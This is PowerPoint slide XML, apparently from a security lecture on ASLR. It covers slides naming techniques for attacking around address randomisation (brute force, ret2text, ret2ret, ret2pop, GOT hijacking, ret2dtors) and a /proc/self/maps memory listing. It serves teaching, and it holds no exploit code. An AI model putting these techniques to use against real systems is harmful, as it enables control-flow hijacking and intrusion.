          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="50000"/>
              <a:alpha val="6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LIBC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Hexagon 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5883108" y="4394377"/>
            <a:ext cx="2029161" cy="1401529"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 14584"/>
              <a:gd name="vf" fmla="val 115470"/>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Linker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430560" y="3363561"/>
            <a:ext cx="2481709" cy="364981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">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520" y="3758776"/>
            <a:ext cx="3883145" cy="1015180"/>
            <a:chOff x="671520" y="3758776"/>
            <a:chExt cx="3883145" cy="1015180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangular Callout 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671521" y="3758776"/>
              <a:ext cx="3883144" cy="1015180"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -7576"/>
                <a:gd name="adj2" fmla="val -120902"/>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Rectangular Callout 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671520" y="3758776"/>
              <a:ext cx="3883145" cy="1015180"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 88967"/>
                <a:gd name="adj2" fmla="val -49554"/>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The next invocation transfers control wherever the attacker wants (e.g., system, pop-ret, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1550421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266700"/>
            <a:ext cx="8229600" cy="879475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>How to attack with ASLR?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="487363" y="1474788"/>
            <a:ext cx="8229600" cy="3554412"/>
            <a:chOff x="487363" y="1474788"/>
            <a:chExt cx="8229600" cy="3554412"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="487363" y="1474788"/>
              <a:ext cx="8229600" cy="709612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B64926"/>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b="1" dirty="0"/>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="487363" y="2330450"/>
              <a:ext cx="1501775" cy="132873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Brute </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Force</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="2330450"/>
              <a:ext cx="2120900"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Non-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>randomized </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t>memory</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583113" y="2330450"/>
              <a:ext cx="1951037"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Stack </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Juggling</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Oval 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="3794125"/>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ret2text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Oval 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="4424362"/>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err="1"/>
                <a:t>Func</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
                <a:t>ptr</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Oval 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583113" y="3810000"/>
              <a:ext cx="2120900"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ret2ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Oval 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4568825" y="4424363"/>
              <a:ext cx="2120900" cy="604837"/>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ret2pop</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6765925" y="2330450"/>
              <a:ext cx="1951038" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="595A5A"/>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GOT</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t>H</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>ijacking</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Oval 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6772275" y="3810000"/>
              <a:ext cx="1944688" cy="604838"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="8E2800">
                <a:alpha val="74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t>ret2got</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="595875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Many other techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45058" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ret2bss, ret2data, ret2heap, ret2eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>string pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ret2dtors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>overwriting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dtors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> section</a:t>
            </a:r>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pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37126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034508"/>
            <a:ext cx="7924800" cy="1308892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Security of ASLR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4226328" y="4267200"/>
            <a:ext cx="3739343" cy="1277273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Optional Reading:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>On the Effectiveness of Address-Space </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Randomization</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shacham</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> et al, ACM CCS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2004</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230904828"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="27941"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="2794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0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/bin/cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/self/maps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>08048000-0804f000 r-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> 00000000 08:01 2514948    /bin/cat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0804f000-08050000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>-p 00006000 08:01 2514948    /bin/cat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>08050000-08071000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>-p 08050000 00:00 0          [heap]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>b7d3b000-b7e75000 r--p 00000000 08:01 1475932    /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/lib/locale/locale-archive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>b7e75000-b7e76000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>-p b7e75000 00:00 0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>b7e76000-b7fcb000 r-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> 00000000 08:01 205950     /lib/i686/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>cmov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/libc-2.7.so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>b7fcb000-b7fcc000 r--p 00155000 08:01 205950     /lib/i686/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>cmov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/libc-2.7.so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>b7fcc000-b7fce000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>-p 00156000 08:01 205950     /lib/i686/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>cmov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/libc-2.7.so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>b7fce000-b7fd1000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>-p b7fce000 00:00 0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>b7fe1000-b7fe3000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>-p b7fe1000 00:00 0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>b7fe3000-b7fe4000 r-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> b7fe3000 00:00 0          [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>vdso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>b7fe4000-b7ffe000 r-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> 00000000 08:01 196610     /lib/ld-2.7.so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>b7ffe000-b8000000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>-p 0001a000 08:01 196610     /lib/ld-2.7.so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>bffeb000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>-c0000000 </a:t>
            </a:r>
            <a:r>
